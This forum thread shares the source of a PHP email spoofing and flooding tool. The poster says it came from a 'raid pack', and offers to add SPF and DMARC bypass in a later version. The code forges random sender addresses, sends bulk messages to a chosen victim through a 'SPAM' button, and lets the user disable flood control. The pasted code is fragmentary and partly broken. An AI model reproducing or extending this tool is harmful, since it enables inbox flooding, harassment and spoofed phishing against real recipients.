User Controls

SMTP Spoofing/Flooding tool that I wrote back during /i/nsurgency wiki

  1. #1
    MLT Yung Blood
    Hey, so, this is just a quick post for a basic SMTP Spoofer/Flooder tool that I wrote years ago but still works. To use this you just need a webserver w/ PHP + STMP on teh same box. This was originally packaged with dangerouskitten raid pack during /i/ back in the day.

    If they have SPF, DMARC, etc in place, then this likely will not work... but if they don't have those in place, itt'l work no problem. It should also work by default on all mail providers other than google chrome. If people actually care then I'll write an updated version of this which will have the ability to bypass SPF and DMARC to effectively perform mail spoofing against more secure mail servers.

    Here is the source code (PHP script w/ HTML/CSS/JS user interface):

    <style type="text/css">
    background-color: #ffccaa;

    background-color: #ffeeca;
    width: 50%;

    background-color: #ffeeca;

    font: normal 0.8em Verdana, sans-serif;
    background-color: #FFFFEE;

    font: normal .8em Verdana, sans-serif;
    <script language="javascript" type="text/javascript">
    function randclick()
    var random = document.getElementById('randbox').checked;
    document.getElementById('frombox').disabled = random;
    document.getElementById('replybox').disabled = random;
    function floodc()
    var fc = document.getElementById('floodbox').checked;
    alert("Turning flood control off almost guarantees detection and action by your ISP.\nOnly turn this off if you are SURE it's okay with your ISP to send the amount of e-mail you plan to send.");
    <title>E-mail Flooder</title>
    <h3>Requires an SMTP and Web server</h3>

    function randomEmail()
    // returns a random, spoofed e-mail address.
    // pick two numbers, one in
    // [6-10] range, one in [4-20] range, and a random domain.
    // for each #, generate that many random letters/numbers, splice together.
    $usernum = rand(3,10);
    $domainnum = rand(4,10);
    // random letter of betabet.
    $ranletter = chr( ord("a") + rand(0, 25) );

    // random letter of betabet.
    $ranletter = chr( ord("a") + rand(0, 25) );

    $email = "$userstr@$";
    return $email;


    $action =$_POST["submit"];

    if($action!=" SPAM ")

    <form method="post" action="?" name="inputpanel">
    <table border="1" cellpadding="2">
    <td colspan="2" class="header">
    <p align="center" style="color: ; font-size: 1.5em">E-Mail Flooder</td>
    <td class="cell1">
    <p align="right"><b>Subject:</b></td>
    <td class="cell2">
    <input name="subject" size="30"/>
    <td colspan="2" class="cell1">
    <p align="center">
    <b>Message to send:</b>
    <td colspan="2" class="cell2">
    <p align="center">
    <textarea rows="6" cols="55" name="message" class="inputbox" style="overflow:scroll"></textarea></td>
    <td class="cell1">
    <p align="right"><b>To:</b></td>
    <td class="cell2">
    <input name="emailto" size="30"/>
    <td class="cell1">
    <p align="right"><b>From:</b></td>
    <td class="cell2">
    <input name="emailfrom" id="frombox" size="30" value="" /><br>
    <smalltext>Random</smalltext> <input type="checkbox" id="randbox" name="random" onClick="javascript:randclick();" value="ON">
    <td class="cell1">
    <p align="right"><b>Reply-To:</b></td>
    <td class="cell2">
    <input name="emailreply" id="replybox" size="30" value="" />
    <td class="cell1">
    <p align="right"><b>Number to Send:</b></td>
    <td class="cell2">
    <input name="emailquantity" size="5" maxlength="4" value="10" /><br>
    <smalltext>Flood Control</smalltext> <input type="checkbox" id="floodbox" name="floodcontrol" onClick="javascript:floodc();" value="ON" checked />
    <td colspan="2" class="header">
    <p align="center"><input class="submit" type="submit" name="submit" value=" SPAM " /></td>

    $to = $_POST["emailto"];
    $from = $_POST["emailfrom"];
    $reply = $_POST["emailreply"];
    $subj = stripslashes($_POST["subject"]);
    $msg = stripslashes($_POST["message"]);
    $random = $_POST["random"];
    $quantity = $_POST["emailquantity"];
    $floodcontrol = $_POST["floodcontrol"];

    echo "You must fill out the Subject, Message, and Recipient.<br>";
    echo "You must enter a sender and a reply-to address.<br>";
    // okay

    $r = randomEmail();
    $from = $r;
    $reply = $r;

    // we're ready.

    $headers = "";
    $headers.="From: $from\r\n";
    $headers.="Reply-To: $from\r\n";
    $headers.="Return-Path: null\r\n";

    $sentaway = @mail($to,$subj,$msg,$headers);

    echo "Sent email <b>#$e</b> from <b>$from</b> to <b>$to</b><br>";
    echo "<font color='red'>Couldn't send email <b>#$e</b></font><br>";
    echo "Wait <u>5</u> seconds...<br>";





  2. #2
    Sophie Pedophile Tech Support
    I got a project for commercial purposes and i'd like to get a web dev onboard if you'd like we could collaborate on the development of what i have in mind. I'm hoping Filtration will be down as well. It'll be pretty dope and not even illegal, imagine that.
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